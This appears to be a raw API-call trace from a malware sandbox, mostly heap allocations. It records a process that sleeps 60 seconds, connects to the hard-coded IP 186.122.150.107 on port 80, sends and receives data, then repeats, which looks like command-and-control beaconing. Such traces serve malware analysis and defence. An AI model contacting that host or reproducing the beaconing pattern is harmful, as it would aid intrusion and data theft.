RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225e008 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225db28 [0165.739] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x225e140 [0165.747] Sleep (dwMilliseconds=0xea60) [0175.759] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0175.760] socket (af=2, type=1, protocol=6) returned 0x210 [0175.762] htons (hostshort=0x50) returned 0x5000 [0175.762] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0175.762] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0175.764] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0175.764] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0175.764] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0175.764] connect (s=0x210, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0176.024] send (s=0x210, buf=0x19d8f8*, len=203, flags=0) returned 203 [0176.025] recv (in: s=0x210, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0176.292] closesocket (s=0x210) returned 0 [0176.293] WSACleanup () returned 0 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bd538 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bc1d0 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22be450 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bf7b8 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bcec0 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bc3f8 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22be228 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22beac8 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bb4e0 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bc620 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bd0e8 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bef18 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bd760 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x22bd988 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22be678 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bbfa8 [0176.293] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bdbb0 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bddd8 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22be000 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bf140 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bf368 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bc848 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bcc98 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22c1810 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bfc08 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22c1a38 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22c13c0 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22bf9e0 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22c2500 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x22c1c60 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2297338 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2294070 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22954c0 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22958d0 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2296500 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2296708 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2297540 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2297748 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2293e68 [0176.294] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e5d50 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e6d90 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e9018 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e7bc8 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e87f8 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e9630 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x22e77b8 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2298838 [0176.295] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2298a30 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2298c28 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2298e20 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2299018 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2299be8 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2299de0 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2299fd8 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x229a1d0 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22ed260 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22eab00 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22ebcb8 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22ea710 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22ea128 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22eb8c8 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x22ec498 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229e0b0 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229c600 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229c9d0 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229cbb8 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229ee08 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229cda0 [0176.296] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229f1d8 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229f5a8 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229c048 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229d170 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229d358 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x229f978 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x22ed958 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x22f0160 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x22f0cd0 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x22eee50 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c5ba0 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c4580 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c3ff8 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c3e20 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c41d0 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c5d78 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c5440 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c4b08 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c5f50 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c6128 [0176.297] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c4ce0 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c4eb8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c3c48 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c5090 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c64d8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x22c36c0 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c8de0 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c7dd8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c8fa8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22caa60 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22ca508 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c9170 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c7a48 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c84f8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c74f0 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c9338 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c7fa0 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c9c20 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c9890 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22ca178 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c9de8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x22c8168 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x227ca78 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x227c708 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x227cc30 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x227cde8 [0176.298] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f2e00 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f21f8 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f2c48 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f4b38 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f3f30 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f2568 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f3a08 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f4cf0 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f1e88 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f4ea8 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f3d78 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x22f2fb8 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a0d10 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a0818 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a0eb8 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a0b68 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a2790 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a2c88 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a1060 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a13b0 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a3180 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a3328 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a34d0 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a3678 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a3820 [0176.299] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22a39c8 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f9010 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x22f8e68 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ce660 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ce000 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cbcf0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cc9b0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cce78 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cb9c0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cc818 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ce198 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cbe88 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ccb48 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cd670 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cd340 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cbb58 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ccce0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22cd808 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x22ce330 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d13a0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22cfb20 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d08e8 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d1fe0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22cf500 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22cf810 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d19c0 [0176.300] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d1b48 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d1528 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d0a70 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22cf998 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d0bf8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d1cd0 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d0d80 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d0f08 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x22d1e58 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d46a8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d3f50 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d37f8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d6118 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d5b38 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d3970 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d4820 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d59c0 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d40c8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d4e00 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d56d0 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d4f78 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d4530 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d50f0 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d3ae8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x22d4998 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22815b8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22834a8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22820f8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22812e8 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2281450 [0176.301] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2282c38 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2283610 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2283778 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x2283a48 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fb9c8 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fa078 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22f9970 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fae88 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22f9f10 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22fbc98 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x22f9ad8 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a6380 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a64d8 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a4090 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a41e8 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a6f98 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a7650 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a77a8 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a68e0 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a7a58 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a7248 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a70f0 [0176.302] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a7900 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a6788 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a6a38 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a73a0 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x22a6b90 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a82f8 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a8d38 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a8068 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a9b50 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a8588 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a9c98 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a8e80 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a9258 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a86d0 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a9de0 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a9f28 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22aa070 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22a8818 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22aafd0 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22ab118 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x22ab260 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d7ed0 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d8c38 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d7510 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d95f8 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d8140 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d78b8 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d8620 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d7c60 [0176.303] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d8fe0 [0176.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d9ad8 [0176.304] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x22d83b0 [0176.310] Sleep (dwMilliseconds=0xea60) [0186.325] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0186.326] socket (af=2, type=1, protocol=6) returned 0x2bc 